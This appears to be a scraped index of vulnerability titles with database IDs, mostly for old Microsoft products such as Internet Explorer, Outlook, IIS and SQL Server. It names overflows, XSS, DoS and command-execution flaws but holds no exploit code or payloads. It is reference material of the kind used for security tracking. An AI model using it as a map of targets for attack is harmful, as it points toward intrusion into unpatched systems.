Microsoft IE USER32.CharLowerA Exception DoS [12806] Microsoft DATA Access IPS DAV Component Remote Arbitrary Content Write [12709] Microsoft HTML Parser Malformed Javascript DoS [12698] Microsoft IE FTP Download Traversal Arbitrary Command Execution [12660] Microsoft IE with RealOne pnxr3260.dll Embed Tag Arbitrary Code Execution [12654] Windows NT getCanonicalPath Memory Corropuption DoS [12652] Microsoft Visual Basic for Applications (VBA) VBE.DLL and VBE6.DLL Long ID Overflow [12612] NetCat for Windows -e Option Overflow [12424] Microsoft IE DHTML Edit ActiveX Control execScript() XSS [12408] Cisco Unity With Microsoft Exchange Multiple Default Accounts [12375] Microsoft Word / Wordpad Font Converter Remote Overflow [12373] Microsoft Word / Wordpad Tables Converter Remote Overflow [12354] Symantec Windows LiveUpdate NetDetect Local Privilege Escalation [12342] Microsoft IE BASE/FORM Address Bar Spoofing [12313] Microsoft IE Cross-domain Browser Window Injection Content Spoofing [12300] Microsoft SharePoint Portal Server STSADM.log- Log Local User Credential Disclosure [12299] Microsoft IE FTP URL Arbitrary Command Injection [12277] Microsoft IE sysimage: Local File Existence Disclosure [12258] Microsoft W3Who ISAPI (w3who.dll) Query String Remote Overflow [12257] Microsoft W3Who ISAPI (w3who.dll) Error Message XSS [12256] Microsoft W3Who ISAPI (w3who.dll) HTTP Connection Header XSS [12206] Apple Safari Spoof Pop-Up Windows [12163] Microsoft IE Save Picture As File Extension Spoofing [12157] Windows Application GUI Masked Password Disclosure [11958] Microsoft Outlook 2003 Image Rendering Security Policy Bypass [11957] Microsoft Outlook Express Troubleshooting Feature SMTP Auth Credential Disclosure [11956] Microsoft Outlook/Express Message body NUL Character DoS [11955] Microsoft IE/Outlook URL FORM Status Bar Spoofing [11954] Microsoft Outlook Express .dbx Deleted E-mail Persistence [11953] Microsoft Outlook Express A HREF Link Overflow DoS [11952] Microsoft Outlook Express S/MIME CA Certificate Spoofing [11951] Microsoft IE/Outlook XML File Attachment Arbitrary Script Execution [11950] Microsoft Outlook Express MIME Header Manipulation File Extension Spoofing Weakness [11949] Microsoft IE/Outlook BGSOUND Tag Information Disclosure [11948] Microsoft IE/Outlook Express IFRAME Tag Parsing Remote DoS [11947] Microsoft IE/Outlook BGSOUND Tag Parsing Remote DoS [11946] Microsoft IE/Outlook Malformed XBM File DoS [11945] Microsoft Outlook 2002 IFRAME Tag Embedded URL [11944] Microsoft Outlook 2002 HREF Tag Embedded JavaScript Execution [11943] Microsoft Outlook Image Tag Cookie Setting Bypass [11942] Microsoft Outlook Express Email Forward Blocked Attachment Access [11941] Microsoft Outlook Express HTML Frame base64 Attachment Security Bypass [11940] Microsoft Outlook Blocked Attachment Access [11939] Microsoft Outlook Attachment Spoofed Content Type [11938] Microsoft Outlook Express Attachment Filename Overflow [11937] Microsoft Outlook 98 Hidden Drive Access [11935] Microsoft Multiple Mail Client Read/Delivery Receipt Tag DoS [11918] Microsoft IE execCommand() File Extension Spoofing [11914] Microsoft Virtual Machine JDBC API Remote Security Check Bypass [11912] Microsoft Virtual Machine JDBC Java Applet Arbitrary DLL Load [11878] Microsoft IE Crafted Path Arbitrary Cookie Overwrite [11742] Microsoft IE Multiple Slash Disabled Protocol/Resource Restriction Bypass [11712] Microsoft ISA Server 2000 H.323 Filter Overflow [11580] Microsoft IE res: URI Handler File Existence Disclosure [11492] Solaris OpenWindows sdtcm_convert Overflow [11455] Microsoft IIS / PWS DOS Filename Request Access Bypass [11452] Microsoft IIS Double Byte Code Arbitrary Source Disclosure [11424] Microsoft Outlook V1 Exchange Server Security Certificate Cleartext Transmission [11423] Microsoft Outlook Malformed Header DoS [11422] Microsoft Outlook Express S/MIME Parsing Routine Remote Overflow [11420] Microsoft Outlook WMP .wms File IFRAME Command Execution [11419] Microsoft Outlook Express Header Carriage Return Filter Bypass [11418] Microsoft Outlook Express text/plain MIME Content Embedded SCRIPT Tag Command Execution [11417] Microsoft Outlook/Express VCard Handler Remote Overflow [11416] Microsoft Outlook/Express Blank Header DoS [11415] Microsoft Outlook Express Forced POP3 Command Mode DoS [11409] Windows NT RRAS/RAS Client Persistent Password Caching [11395] F-Secure Anti-Virus for Microsoft Exchange Nested Password Protected Archives Bypass [11337] Microsoft IE FRAME/IFRAME/EMBED Tag Overflow [11277] Microsoft IIS SSL ISAPI Filter Cleartext Information Disclosure [11274] Microsoft IE &quot [11268] Microsoft Exchange Internet Mail Service AUTH/AUTHINFO Command DoS [11257] Microsoft IIS Malformed GET Request DoS [11222] Microsoft XP SP2 Authenticated User Remote Shutdown [11170] Microsoft IE iframe Malformed base href DoS [11157] Microsoft IIS FTP Service PASV Connection Saturation DoS [11152] Microsoft IE Malformed HTML Style DoS [11138] Microsoft IE HTML Rendering mshtml.dll NULL Pointer Dereference DoS [11101] Microsoft IIS Multiple Slash ASP Page Request DoS [11097] Windows NT SP2 Passfilt.dll Password Complexity Weakness [11088] Multiple VAX DECwindows Motif Server Local Privilege Escalation [11068] Windows NT Win32k.sys Incorrect Parameter Local DoS [11067] Windows NT NonPagedPool Lock Saturation DoS [11063] Microsoft Site Server Direct Mailer TMLBQueue Share Information Disclosure [11051] Microsoft Outlook cid: MIME Mishandling Forced Image Rendering [11018] Microsoft SNA Server AS/400 Local APPC LU Shared Folder Disclosure [11017] OpenVMS DECwindows/MOTIF User Account Lockout Weakness [11010] Windows 2003 Multiple DACL Insecure Permissions [10998] Microsoft Access Snapshot Viewer ActiveX Control Arbitrary Command Execution [10996] Microsoft File Transfer Manager ActiveX Control Arbitrary Command Execution [10995] Microsoft File Transfer Manager ActiveX Control Arbitrary File Upload/Download [10994] Microsoft DirectX Files Viewer ActiveX Control xweb.ocx Overflow [10992] Microsoft IE Embedded HTML Help Control Cross Zone Scripting [10991] Microsoft IE HTML Help Drag and Drop Arbitrary Code Injection [10977] Microsoft Eyedog ActiveX Server Side Redirect Arbitrary Command Execution [10969] HP Tru64 X Windows Unspecified Local Overflow [10968] HP Tru64 UNIX X Windows Unspecified File Permission Weakness [10967] Microsoft IE Javascript User Homepage Address Spoofing [10935] Microsoft Word Macro Security Model Bypass [10895] Microsoft FrontPage asycpict.dll JPEG Processing DoS [10756] Microsoft MSN heartbeat.ocx Component Overflow [10736] Microsoft Excel SYLK Macro Arbitrary Command Execution [10735] Microsoft Excel Virus Warning Mechanism Bypass [10734] Microsoft Word/Excel Shared Document INCLUDEPICTURE Field Arbitrary File Read [10733] Microsoft Word/Excel Shared Document INCLUDETEXT Field Arbitrary File Read [10714] Microsoft cabarc Traversal Arbitrary File Overwrite [10709] Microsoft IE SSL Cached Content Spoofing [10708] Microsoft IE Image Tag Arbitrary Script Execution (HijackClick 3) [10707] Microsoft IE Plug-in Navigation Address Bar Spoofing [10706] Microsoft IE Double Byte Character Set Address Bar Spoofing [10705] Microsoft IE Install Engine Inseng.dll Arbitrary Code Execution [10704] Microsoft IE Similar Method Name Redirection Cross Domain/Site Scripting [10694] Microsoft Excel XLS File Local Overflow (MS04-033) [10670] Microsoft ASP.NET Forms .aspx File Authentication Bypass [10561] Apple QuickTime Player for Windows URL Handling Overflow [10557] Microsoft ASP.NET Canonicalization Authentication Bypass [10550] Microsoft IE Redirect Script Arbitrary XML Document Access [10549] Microsoft Word .doc Parsing Exception Arbitrary Command Execution [10379] Microsoft SQL Server Large Query DoS [10358] Microsoft Outlook Client Persistent X-UIDL Header DoS [10246] Microsoft Exchange Server Malformed NNTP AUTHINFO DoS [10183] Microsoft SQL Server xp_sprintf Function DoS [10181] Microsoft SQL Server formatmessage Function DoS [10166] Microsoft SQL Server raiserror Function DoS [10159] Microsoft SQL Server Multiple Extended Stored Procedure Overflows [10158] Microsoft SQL Server Password Encryption Procedure Overflow [10157] Microsoft SQL Server BULK INSERT Query Overflow [10156] Microsoft SQL Server SQLExecutiveCmdExec Account Credential Encryption Weakness [10155] Microsoft SQL Server Enterprise Manager Authentication Credential Encryption Weakness [10154] Microsoft SQL Server xp_SetSQLSecurity Function Overflow [10153] Microsoft SQL Server xp_proxiedmetadata Function Overflow [10152] Microsoft SQL Server xp_printstatements Function Overflow [10151] Microsoft SQL Server xp_peekqueue Function Remote Overflow [10150] Microsoft SQL Server xp_updatecolvbm Function Overflow [10149] Microsoft SQL Server xp_showcolv Function Remote Overflow [10148] Microsoft SQL Server xp_enumresultset Function Overflow [10147] Microsoft SQL Server xp_displayparamstmt Function Overflow [10146] Microsoft SQL Server xp_sprintf Function Overflow [10145] Microsoft SQL Server formatmessage Function Overflow [10144] Microsoft SQL Server raiserror Function Overflow [10143] Microsoft SQL Server OpenRowset OLE DB Provider Name Overflow [10142] Microsoft SQL Server OpenDataSource OLE DB Provider Name Overflow [10141] Microsoft SQL Server sestup.iss File Authentication Credential Disclosure [10140] Microsoft SQL Server Stored Procedure Arbitrary Command Execution [10139] Microsoft SQL Server Agent Arbitrary File Creation [10138] Microsoft SQL Server xp_displayparamstmt Procedure Privilege Escalation [10137] Microsoft SQL Server xp_printstatements Procedure Privilege Escalation [10136] Microsoft SQL Server xp_execresultset Procedure Privilege Escalation [10135] Microsoft SQL Server Malformed 0x08 Packet DoS [10133] Microsoft SQL Server sp_MScopyscript Procedure scriptfile Parameter Arbitrary Code Execution [10132] Microsoft SQL Server Authentication Function Remote Overflow [10131] Microsoft SQL Server DBCC SourceDB Argument Arbitrary Command Execution [10129] Microsoft Data Access Components SQL-DMO Broadcast Request Overflow [10127] Microsoft SQL Server xp_runwebtask Procedure Privilege Escalation [10126] Microsoft SQL Server CreateFile API Function Privilege Escalation [10125] Microsoft SQL Server Named Pipe Hijack Privilege Escalation [10123] Microsoft SQL Server LPC Packet Handling Local Overflow [10104] Microsoft BizTalk Server DTA RawCustomSearchField.asp SQL Injection [10103] Microsoft BizTalk Server DTA rawdocdata.asp SQL Injection [10050] IBM OEM Windows XP Home Default Hidden Administrator Account [10006] Microsoft WordPerfect Converter Corel File Multiple Parameter Remote Overflow [9951] Microsoft Multiple Products GDIPlus.dll JPEG Processing Overflow [9896] Microsoft Netmeeting Remote Desktop Sharing Remote Session Hijack [9895] Microsoft NetMeeting Arbitrary Clipboard Content Disclosure [9818] F-Secure Anti-Virus For Microsoft Exchange Content Scanner Server Exception Handling DoS [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing [9671] Microsoft IE onUnload Address Bar Spoofing [9591] Windows Kernel Error Message Debugging Local Overflow [9560] HP Systems Insight Manager Microsoft Security Patch Login DoS [9543] Jetty CGI+windows Unspecified Security Issue [9315] Microsoft IIS getdrvs.exe ODBC Sample Information Disclosure [9314] Microsoft IIS mkilog.exe ODBC Sample Arbitrary Command Execution [9207] Microsoft Content Management ManualLogin.asp REASONTXT Parameter XSS [9200] Microsoft IIS Unspecified XSS Variant [9199] Microsoft IIS shtml.dll XSS [9189] Microsoft ASP.Net Null Character XSS Protection Bypass [9172] Microsoft IE File/Directory Existence Disclosure [9167] Microsoft Outlook Express BCC: Recipient Information Disclosure [9070] Microsoft IE dragDrop Arbitrary File Upload (What a Drag II) [8978] Microsoft IE Address Bar Spoofing (NullyFake) [8941] Microsoft IE Merlin.speak Function CPU DoS [8428] Microsoft NetMeeting Malformed Packets DoS [8414] Microsoft IE mms: Protocol Handler Arbitrary Command [8372] thttpd for Windows Encoded Traversal Arbitrary File Access [8335] Microsoft IE mshtml.dll Null Pointer DoS [8309] Mozilla Browsers For Windows XPInstall Security Dialog Arbitrary Extension Installation [8277] Microsoft IE Malformed GIF Double-free DoS [8276] Microsoft IE Malformed BMP Overflow [8275] Microsoft IE Navigation Cross Domain Execution (InsiderPrototype) [8243] Microsoft SMS Port 2702 DoS [8224] Microsoft IE CSS Memory Corruption DoS [8211] Microsoft Exchange Server Malformed SMTP Command DoS [8210] Microsoft HTML Control Large Form Field DoS [8148] Microsoft IE Arbitrary File Write (What a Drag) [8129] Microsoft IE CSS Malformed div element DoS [8098] Microsoft IIS Virtual Directory ASP Source Disclosure [8053] Microsoft Virtual Machine Illegal Cast Operation Command Execution [8052] Microsoft ActiveX Control Arbitrary Cabinet File Execution [7963] Microsoft IE parent.window.open location.cache Script Execution [7951] Microsoft SMS Remote Control Client DoS [7916] Microsoft IE Multimedia Page XSS (viaSWFurl) [7915] Microsoft IE ADODB.Stream Media Arbitrary File Execution [7914] Microsoft IE .FOLDER File Type Execution [7913] Microsoft IE Shell.Application ActiveX Arbitrary Command Execution [7912] Microsoft IE showHelp() Arbitrary File Execution [7910] Microsoft IE Double Slash Cache File Execution (DblSlashForCache) [7909] Microsoft IE Cache Location Information Disclosure (execdror6) [7907] Microsoft IE FileSystemObject ActiveX Object Arbitrary Command Execution [7906] Microsoft IE WebBrowser ActiveX Object Clipboard Content Disclosure [7905] Microsoft IE ie5setup.exe Multple Service Disable [7903] Microsoft IE external.NavigateAndFind Arbitrary File Access [7902] Microsoft IE / Outlook Express Active Scripting Arbitrary E-mail Message Access [7901] Microsoft IE Active Setup ActiveX Component Arbitrary Software Installation [7900] Microsoft IE WebBrowser Control NavigateComplete2 Policy Bypass [7899] Microsoft IE with ActivePython ActiveX Control Arbitrary File Read [7898] Microsoft IE with Google Toolbar Malicious HTML DoS [7897] Microsoft IE Crafted Filename Arbitrary Visual FoxPro Application Execution [7896] Microsoft IE Java Implementation Malformed Domain Portion Arbitrary Script Execution [7895] Microsoft IE MS-DOS Device Name URL DoS [7894] Microsoft IE Object Tag Type Property Double-byte Overflow [7893] Microsoft IE window.open file: Security Bypass (WsOpenFileJPU) [7892] Microsoft IE href Javascript Arbitrary Command Execution (BodyRefreshLoadsJPU) [7890] Microsoft IE Download Function Cache Disclosure (threadid10008) [7889] Microsoft IE createTextRange Security Bypass (LinKiller) [7888] Microsoft IE createRange FIND Dialog Security Bypass (Findeath) [7887] Microsoft IE XML Data Binding Object Tag Arbitrary Command Execution [7886] Microsoft Java Virtual Machine StandardSecurityManager Restriction Bypass [7885] Microsoft Java Implementation Applet Tag DoS [7884] Microsoft Java Virtual Machine Passed HTML Object DoS [7883] Microsoft Java Implementation CabCracker Class Security Bypass [7882] Microsoft Java Applet Codebase Tag Arbitrary File Read [7881] Microsoft Java Implementation INativeServices Clipboard Content Disclosure [7880] Microsoft Java INativeServices Arbitrary Memory Information Disclosure [7879] Microsoft Java getAbsolutePath Current Directory Disclosure [7878] Microsoft Java Virtual Machine ClassLoader.loadClass Overflow [7877] Microsoft Java Virtual Machine Class.forName Overflow [7876] Microsoft IE .isp File Arbitrary Command Execution [7874] Microsoft IE Cross-domain Sub-frame Navigation Content Spoofing [7872] Microsoft IE ActiveX Object Code Arbitrary Command Execution (Qhosts) [7866] Microsoft IE Frame Spoofing Content Injection [7864] Microsoft IE URL History FTP Credential Disclosure [7863] Microsoft IE OBJECT Tag Long CLASSID DoS [7862] Microsoft IE User DAT File History Disclosure [7861] Microsoft IE Standard Cache Control Authentication Credential Leak [7860] Microsoft IE Java JSObject Cross Frame Security Policy Bypass [7859] Microsoft IE Frame Domain Verification Arbitrary File Access [7858] Microsoft IE CLSID Alteration Arbitrary Command Execution [7857] Microsoft IE Script Tag SRC Value Arbitrary File Access [7856] Microsoft IE Q312461 Patch HTTP_USER_AGENT Information Disclosure [7854] Microsoft IE Chinese Character Scrolling DoS [7853] Microsoft IE window.createPopup Chromeless Window Spoofing [7852] Microsoft IE showModelessDialog Infinite Loop DoS [7851] Microsoft IE Multiple Form Field DoS [7850] Microsoft IE Malformed Content Header Arbitrary Command Execution [7849] Microsoft IE Javascript location.replace Recursive DoS [7848] Microsoft IE userData storeuserData Cookie Privacy Setting Bypass [7847] Microsoft IE JVM System.out.println Logging Arbitrary Command Execution [7846] Microsoft IE PNG Invalid Length Code DoS [7845] Microsoft IE Encoded URL Information Disclosure [7844] Microsoft IE Object Tag Temporary File Information Disclosure [7843] Microsoft IE URLMON.DLL Multiple Overflows [7842] Microsoft IE File Upload Control Arbitrary File Access [7841] Microsoft IE Scriptlet Component Arbitrary File Access [7840] Microsoft IE Javascript Applet Data Redirect Arbitrary File Access [7839] Microsoft IE Malformed Favorite Icon Arbitrary Command Execution [7838] Microsoft IE File Upload Control Paste Arbitrary File Read [7837] Microsoft IE Cross Frame Security Arbitrary File Access [7836] Microsoft IE EMBED Tag Overflow [7835] Microsoft IE IFRAME Document.ExecCommand Restriction Bypass Arbitrary File Access [7834] Microsoft IE Preloader Legacy ActiveX Arbitrary File Access [7833] Microsoft IE/OE res: Protocol Library Overflow [7832] Microsoft IE Client Window Reference Server Side Arbitrary File Access [7831] Microsoft IE Virtual Machine Java Applet Sandbox Bypass [7830] Microsoft IE mk: URL Handling Remote Overflow [7829] Microsoft IE JScript Engine Window.External Function Arbitrary Command Execution [7828] Microsoft IE Dotless IP Address Zone Privilege Escalation [7827] Microsoft IE Cross Security Domain Arbitrary File Access [7826] Microsoft IE SSL Certificate Validation Failure (v2) [7825] Microsoft IE Domain Frame Arbitrary File Access [7824] Microsoft IE Virtual Machine Unsigned Applet Arbitrary Command Execution [7823] Microsoft IE Cached Content .chm Arbitrary Program Execution [7822] Microsoft IE HTML Form Input Element Arbitrary File Access [7821] Microsoft IE Print Templates Feature Arbitrary ActiveX Execution [7820] Microsoft IE Scriptlet Invoking ActiveX Arbitrary File Access [7819] Microsoft IE Small IFRAME DHTML Arbitrary File Access [7818] Microsoft IE Page Redirect Authentication Credential Leak [7817] Microsoft IE Frame Domain Validation Arbitrary File Access [7816] Microsoft IE SFU Telnet Client Arbitrary Command Execution [7807] Microsoft IIS ISAPI Virtual Directory UNC Mapping ASP Source Disclosure [7806] Microsoft IE HTML E-mail Feature Unusual MIME Type Command Execution [7802] Microsoft IE File Download Extension Spoofing [7801] Microsoft IE Javascript window.open Null-Pointer DoS [7793] Microsoft Outlook Express Header Validation DoS [7779] Microsoft IE AnchorClick Cross Zone Scripting [7778] Microsoft Outlook Window Opener Script Execution [7776] Microsoft IE Download Window Filename Filetype Spoofing [7775] Microsoft IE Channel Link Script Injection [7774] Microsoft IE Popup.show() Click Hijack (HijackClick 3) [7769] Microsoft Outlook With Word Editor Object Tag Code Execution [7762] Microsoft Java Virtual Machine Cross-Site Communication [7746] Windows NT FTP Server (WFTP) CD Command Arbitrary File Access [7739] Microsoft IE plugin.ocx Load() Method Overflow [7737] Microsoft IIS ASP Redirection Function XSS [7608] Microsoft Index Server Internet Data Query Path Disclosure [7607] Microsoft IE CSS Unterminated Comment Handling Memory Corruption [7595] Mozilla Browsers for Windows shell: URI Arbitrary Command Execution [7405] Microsoft Phone Dialer (dialer.exe) Dialer Entry Overflow [7296] Microsoft IE Cross-domain Frame Injection Content Spoofing [7293] Microsoft Plus! Compressed Folder Password Disclosure [7265] Microsoft IIS .ASP Session ID Disclosure and Hijacking [7202] Microsoft PowerPoint 2000 File Loader Overflow [7187] Microsoft MN-500 Web Administration Multiple Connections DoS [7168] Microsoft Data Access Component Internet Publishing Provider WebDAV Security Zone Bypass [7096] Microsoft Outlook Express Mac OS Auto HTML Download [7055] Microsoft Outlook Express for Mac OS E-mail Long Line DoS [6971] Microsoft ISA Server 2000 ICMP Rule Bypass During Startup [6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure [6969] Microsoft ISA Server 2000 Invalid DNS Request DoS [6968] Microsoft ISA Server 2000 FTP Port Scan Bounce Weakness [6967] Microsoft ISA Server 2000 UDP Packet Winsock DoS [6965] Microsoft ISA Server 2000 SSL Packet DoS [6964] Microsoft ISA Server 2000 DNS Intrusion Detection Filter DoS [6963] Microsoft IE showModalDialog Method Arbitrary Code Execution [6931] Microsoft IE/Outlook Double Null Character DoS [6749] Microsoft Crystal Reports Web Viewer crystalimagehandler.aspxArbitrary File Access [6742] Microsoft DirectPlay Packet Validation DoS [6674] Microsoft Office 98 for Macintosh Disk Space Information Disclosure [6672] Microsoft SharePoint with MSIE settings.htm Authentication Bypass [6538] Microsoft IE/Outlook ImageMap URL Spoofing [6272] Microsoft IE MIME Content-Type Header Processing Weakness Cross-content XSS [6257] Symantec Norton Anti-Virus CE Windows XP Floppy Scan Bypass [6217] Microsoft Outlook RTF Embedded Object Security Bypass [6121] Microsoft Outlook Express BASE HREF Web Content Loading [6080] Microsoft IE MSHTML.DLL Cross-Frame Script Execution [6079] Microsoft Outlook Remote XML Loading [6031] Microsoft Exchange Multiple SMTP Command DoS [6007] Microsoft IE/Outlook IMG/HREF Tag Code Execution [5998] Microsoft Outlook Predictable File Caching [5993] Microsoft Active Server Pages (ASP) Engine Malformed Cookie Handling Remote Information Disclosure [5965] Microsoft IE MSHTML.DLL IMG SRC Tag Information Disclosure [5936] Microsoft SMTP Service 4xx Error Code DoS [5887] Microsoft Access 97 Cleartext Password Storage [5884] Microsoft Site Server ASP Upload Remote Command Execution [5869] Microsoft IE MSHTML.DLL Javascript %01 URL Arbitrary File Access [5856] X Windows (X11) Magic Cookie Prediction Command Execution [5855] Microsoft Exchange MTA HELO Command Remote Overflow [5851] Microsoft IIS Single Dot Source Code Disclosure [5833] Windows NT FTP Server (WFTP) Unprintable Character Overflow [5829] Windows NT FTP Server (WFTP) Error Message Server Path Disclosure [5736] Microsoft IIS Relative Path System Privilege Escalation [5694] Microsoft IE Address Bar URL Spoofing [5693] Microsoft MS00-060 Patch IIS Malformed Request DoS [5633] Microsoft IIS Invalid WebDAV Request DoS [5608] Microsoft NetMeeting Malformed String DoS [5606] Microsoft IIS WebDAV PROPFIND Request DoS [5600] Oracle Database on Windows NT Net8 Listener Thread Exhaustion Remote DoS [5584] Microsoft IIS URL Redirection Malformed Length DoS [5581] Trend Micro ScanMail for Microsoft Exchange Administrative Credential Disclosure [5566] Microsoft IIS Form_VBScript.asp XSS [5563] Microsoft IE Telnet Client SFU Arbitrary Command Execution [5557] Microsoft Outlook Web Access With IE Embedded Script Execution [5556] Microsoft IE Dotless IP Intranet Zone Spoofing [5419] Microsoft IE mshtml.dll EMBED Directive Overflow [5390] Microsoft Exchange NTLM Null Session Mail Relay [5357] Microsoft Multiple Products for Mac File URL Overflow [5356] Microsoft IE for Mac Local AppleScript Invocation [5355] Microsoft MSN Chat ActiveX ResDLL Parameter Overflow [5347] Microsoft SQL Server SQLXML ISAPI Extension Remote Overflow [5343] Microsoft SQL Server SQLXML root Parameter XSS [5342] Microsoft IE Malformed Web Page Zone Spoofing [5316] Microsoft IIS ISAPI HTR Chunked Encoding Overflow [5242] Microsoft IE/Outlook MHTML .chm ITS Protocol Handler Code Execution [5241] Microsoft Jet Database Engine Remote Code Execution [5175] Microsoft Excel Hyperlinked Workbook Arbitrary Code Execution [5174] Microsoft Excel Inline Macro Arbitrary Code Execution [5173] Microsoft Excel Embedded XSL Stylesheet Arbitrary Code Execution [5172] Microsoft Commerce Server OWC Installer LocalSystem Arbitrary Code Execution [5171] Microsoft Word 2002 Mail Merge Tool Execute Arbitrary Script [5170] Microsoft Commerce Server OWC Installer Arbitrary Command Execution [5163] Microsoft Commerce Server AuthFilter ISAPI Filter Overflow [5162] Microsoft IE Legacy Data-island Capability Read Arbitrary XML File [5152] Microsoft Legacy Text Formatting ActiveX Control Overflow [5134] Microsoft IE Reference Local HTML Resource Script Execution [5133] Microsoft Metadirectory Services LDAP Client Authentication Bypass [5129] Microsoft IE Download File Origin Spoofing [5126] Microsoft BackOffice Authentication Bypass [5124] Microsoft TSAC ActiveX Long Server Name Overflow [5064] Microsoft SQL Server Jet Engine OpenDataSource Function Overflow [4968] Microsoft SharePoint Portal Server Multiple Unspecified XSS [4951] Microsoft IE CLASSID Remote DoS [4932] Microsoft Outlook Web Access SecurID Authentication Bypass [4915] Microsoft Content Management Server (MCMS) Web Authoring Command File Upload Arbitrary Code Execution [4914] Microsoft Content Management Server (MCMS) Resource Request SQL Injection [4864] Microsoft IIS TRACK Logging Failure [4863] Microsoft IIS Active Server Page Header DoS [4862] Microsoft Content Management Server (MCMS) Unspecified Authentication Function Overflow [4791] Microsoft IIS Response Object DoS [4779] Microsoft Desktop Engine (MSDE) 2000 Stored Procedure SQL Injection [4778] Microsoft SQL Server 2000 Stored Procedure SQL Injection [4777] Microsoft Desktop Engine (MSDE) 2000 Database Consistency Checkers (DBCCs) Overflow [4776] Microsoft SQL Server 2000 Database Consistency Checkers (DBCCs) 2000 Overflow [4734] InoculateIT Microsoft Exchange Inbox Folder Tree Moved Message Scanning Bypass [4655] Microsoft IIS ssinc.dll Long Filename Overflow [4627] Microsoft IE Text Control Overflow [4626] Microsoft DirectX Files Viewer xweb.ocx Overflow [4578] Microsoft SQL Resolution Service Monitor Thread Registry Key Name Overflow [4577] Microsoft SQL Resolution Service 0x08 Byte Long String Overflow [4535] Microsoft Media Services ISAPI nsiislog.dll POST Overflow [4513] Microsoft Visual C++ Constructed ISAPI Extensions [4337] Windows NT FTP Server (WFTP) Pro Server Administrative GUI DoS [4186] Microsoft IE Cookie Path Traversal [4168] Microsoft Outlook 2002 mailto URI Script Injection [4116] Windows NT FTP Server (WFTP) Xerox Docutech DoS [4115] Windows NT FTP Server (WFTP) Server CPU Utilization DoS [4114] Windows NT FTP Server (WFTP) Server STAT/LIST Command DoS [4078] Microsoft IE Cross Frame Scripting Restriction Bypass [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure [3968] Microsoft FrontPage Personal Web Server Arbitrary File Access [3893] Microsoft Virtual PC for Mac Insecure Temporary Files Creation [3879] Microsoft IE File Identification Variant [3791] Microsoft IE Travel Log Arbitrary Script Execution [3738] Microsoft IE Content-disposition Header File Download Extension Spoofing [3512] Microsoft IIS ODBC Tool getdrvrs.exe Remote DSN Creation [3501] Microsoft FrontPage form_results Information Disclosure [3500] Microsoft IIS fpcount.exe Remote Overflow [3490] Microsoft Exchange 2003 OWA Mailbox Access Information Disclosure [3457] Microsoft MDAC Broadcast Reply Overflow [3446] HD Soft Windows Ftp Server wscanf Function Format String [3386] Microsoft FrontPage Server Extensions htimage.exe File Existence Enumeration [3385] Microsoft FrontPage Server Extensions htimage.exe Remote Path Disclosure [3384] Microsoft FrontPage htimage.exe Overflow [3383] Microsoft FrontPage Server Extensions imagemap.exe File Verification [3382] Microsoft FrontPage Server Extensions imagemap.exe Remote Path Disclosure [3381] Microsoft FrontPage imagemap.exe Overflow [3341] Microsoft IIS Redirect Response XSS [3339] Microsoft IIS HTTP Error Page XSS [3338] Microsoft IIS Help File XSS [3328] Microsoft IIS FTP Status Request DoS [3326] Microsoft IIS w3svc.dll ISAPI Filter URL Handling Remote DoS [3325] Microsoft IIS HTR ISAPI Overflow [3323] Microsoft IIS ISAPI .printer Extension Host Header Overflow [3320] Microsoft IIS ASP Server-Side Include Buffer Overflow [3316] Microsoft IIS HTTP Header Field Delimiter Overflow [3313] Microsoft Word Form Protection Bypass [3307] Microsoft IE showHelp() Zone Restriction Bypass [3301] Microsoft IIS ASP Chunked Encoding Variant Heap Overflow [3300] Microsoft FrontPage shtml MS-DOS Device Name DoS [3284] Microsoft IIS Winmsdp.exe Arbitrary File Retrieval [3257] Jordan Windows Telnet Server Overflow [3231] Microsoft IIS Log Bypass [3225] Microsoft IE for Mac Information Disclosure [3195] Microsoft Exchange OWA REFERER Header XSS [3144] Microsoft IE MHTML Redirection Local File Parsing (MhtRedirParsesLocalFile) [3143] Microsoft IE MHTML Arbitrary File Execution (MhtRedirLaunchInetExe) [3142] Microsoft IE Subframe XSS (BackToFramedJpu) [3108] Microsoft Office 98 Macintosh Information Disclosure [3104] Microsoft IE PPC Overwrite Arbitrary Files [3099] Microsoft IE _search Window Execute Code (WsBASEjpu) [3098] Microsoft IE history.back NAF Function Execute Script (NAFjpuInHistory) [3097] Microsoft IE window.open Function Execute Code (WsFakeSrc) [3096] Microsoft IE NavigateAndFind Function Execute Code (NAFfileJPU) [3095] Microsoft IE history.back Function Information Disclosure (RefBack) [3094] Microsoft IE window.moveBy Cursor Hijack (HijackClick) [3068] Microsoft IE MSHTML/EditFlag Auto Open DoS [3066] Microsoft IE Custom HTTP Errors Script Injection [3065] Microsoft IE Unparsable XML File XSS [3056] Microsoft IE MSN/Alexa Information Leak [3055] Microsoft IE Spoofed URL [3054] Microsoft IE %USERPROFILE% Folder Disclosure [3053] Microsoft IE MHTML File Handler Arbitrary Script Injection [3052] Microsoft IE/Outlook CODEBASE PopUp Object Remote Execution [3051] Microsoft IE MHT Web Archive Overflow [3050] Microsoft IE dragDrop Method Local File Reading [3049] Microsoft IE ftp.htt FTP Web View URL XSS [3036] Microsoft IE dynsrc File Information Leak [3035] Microsoft WebBrowser Control t:video File Execution [3034] Microsoft IE JavaScript script src Local File Enumeration [3033] Microsoft IE Content Type/Disposition File Execution [3032] Microsoft IE XMLHTTP Control Arbitrary Remote File Access [3031] Microsoft IE document.Open Same Origin Policy Violation [3030] Microsoft IE GetObject() Function Traveral Arbitrary File Access [3029] Microsoft IE Cookie Execute Script in Local Computer Zone [3028] Microsoft IE Content-disposition Header Auto Download/Execute [3011] Microsoft IE OWC ConnectionFile File Existence Verification [3010] Microsoft IE OWC XMLURL File Existence Verification [3009] Microsoft IE OWC Load File Existence Verification [3008] Microsoft IE OWC Cut/Paste Data Read and Injection [3007] Microsoft IE OWC LoadText Read Arbitrary File [3006] Microsoft IE OWC Script Execution [3005] Microsoft IE WebBrowser Control dialogArguments XSS [3004] Microsoft IE Gopher Client Overflow [3003] Microsoft IE/Outlook OBJECT Cross Domain Scripting [3002] Microsoft IE File Extension Dot Parsing [3001] Microsoft IE XP HCP URI Handler File Deletion [2999] Microsoft IE Powerpoint Mouse-Over Execute [2998] Microsoft IE Frame Javascript URL Cross-Domain Script Execution [2997] Microsoft IE oIFrameElement.Document IFRAME Bypass 